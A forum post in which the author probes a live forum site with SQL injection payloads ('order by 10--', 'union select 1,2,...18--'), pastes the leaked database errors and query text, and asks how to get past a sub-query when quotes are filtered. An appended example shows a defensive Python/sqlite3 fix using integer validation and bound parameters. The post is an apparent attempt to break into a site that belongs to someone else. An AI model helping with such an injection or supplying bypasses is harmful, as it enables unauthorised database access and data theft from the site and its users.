Greetings everyone,
I need some ideas to understand what is happening in this SQL injection case.
1 - Finding the number of columns:
dominio.com/cat/1/1 order by 10--
Unknown column '10' in 'order clause'
SELECT pc.cat_name AS parent_cat_name, c.cat_name AS cat_name FROM wb_forum_parent_categories pc INNER JOIN wb_forum_categories c ON (pc.id = c.parent_cat_id) WHERE c.id = 1 order by 10-- LIMIT 1
With order by 2, the page displays normally. (2 columns)
2 - Finding the visible column(s):
dominio.com/cat/1/1 union select 1,2--
Error Number: 1222
The used SELECT statements have a different number of columns
SELECT p.*, 0 AS read_id, m.member_name AS username, (SELECT m2.member_name AS last_post_username FROM wb_forum_posts p2 LEFT JOIN smf_members m2 ON (m2.id_member = p2.user_id) WHERE p2.deleted = 0 AND p2.relation_id = p.id ORDER BY p2.created DESC LIMIT 1) AS last_post_username, (SELECT p2.created AS last_post_date FROM wb_forum_posts p2 WHERE p2.deleted = 0 AND p2.relation_id = p.id ORDER BY p2.created DESC LIMIT 1) AS last_post_date FROM wb_forum_posts p LEFT JOIN smf_members m ON (m.id_member = p.user_id) WHERE p.deleted = 0 AND p.cat_id = 1 union select 1,2-- AND p.post_id = 0 GROUP BY p.id ORDER BY p.priority DESC, p.created DESC
3 - Manually trying a different number of columns:
union select 1,2,3,4,5... up to 18.
Error Number: 1222
The used SELECT statements have a different number of columns
SELECT pc.cat_name AS parent_cat_name, c.cat_name AS cat_name FROM wb_forum_parent_categories pc INNER JOIN wb_forum_categories c ON (pc.id = c.parent_cat_id) WHERE c.id = 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- LIMIT 1
Is there any way to skip that sub-query?
Thanks.
P.S.: Neither double nor single quotes can be used.
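
Added example, not part of the original post and not the site's own code: the two error outputs above show the same URL segment being concatenated into two different statements (the category lookup and the post listing), with the database error text returned to the client. The Python/sqlite3 code below shows the server-side fix, validating the segment as an integer and binding it in both queries; the reduced schema, sample rows and function names are constructed assumptions.

```python
import re
import sqlite3

# Constructed, reduced schema: table names come from the error output above,
# the column subset and the sample rows are assumptions for this example.
SCHEMA = """
CREATE TABLE wb_forum_parent_categories (id INTEGER PRIMARY KEY, cat_name TEXT);
CREATE TABLE wb_forum_categories (id INTEGER PRIMARY KEY, parent_cat_id INTEGER, cat_name TEXT);
CREATE TABLE wb_forum_posts (id INTEGER PRIMARY KEY, cat_id INTEGER, title TEXT, deleted INTEGER);
INSERT INTO wb_forum_parent_categories VALUES (1, 'General');
INSERT INTO wb_forum_categories VALUES (1, 1, 'News');
INSERT INTO wb_forum_posts VALUES (10, 1, 'Welcome', 0);
"""

# Both statements take the category id as a bound parameter (?).
CATEGORY_SQL = (
    "SELECT pc.cat_name AS parent_cat_name, c.cat_name AS cat_name "
    "FROM wb_forum_parent_categories pc "
    "INNER JOIN wb_forum_categories c ON (pc.id = c.parent_cat_id) "
    "WHERE c.id = ? LIMIT 1"
)
POSTS_SQL = "SELECT p.id, p.title FROM wb_forum_posts p WHERE p.deleted = 0 AND p.cat_id = ?"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def parse_cat_id(segment):
    """Accept only a plain decimal id; anything else is rejected before any SQL runs."""
    if not re.fullmatch(r"[0-9]{1,9}", segment):
        raise ValueError("invalid category id")
    return int(segment)


def load_category_page(conn, segment):
    """Run both queries with the id bound as a parameter, never concatenated."""
    cat_id = parse_cat_id(segment)
    try:
        category = conn.execute(CATEGORY_SQL, (cat_id,)).fetchone()
        posts = conn.execute(POSTS_SQL, (cat_id,)).fetchall()
    except sqlite3.Error:
        # Log the detail server-side; the client never sees the statement or driver error.
        raise RuntimeError("database error") from None
    return category, posts


if __name__ == "__main__":
    print(load_category_page(make_db(), "1"))
```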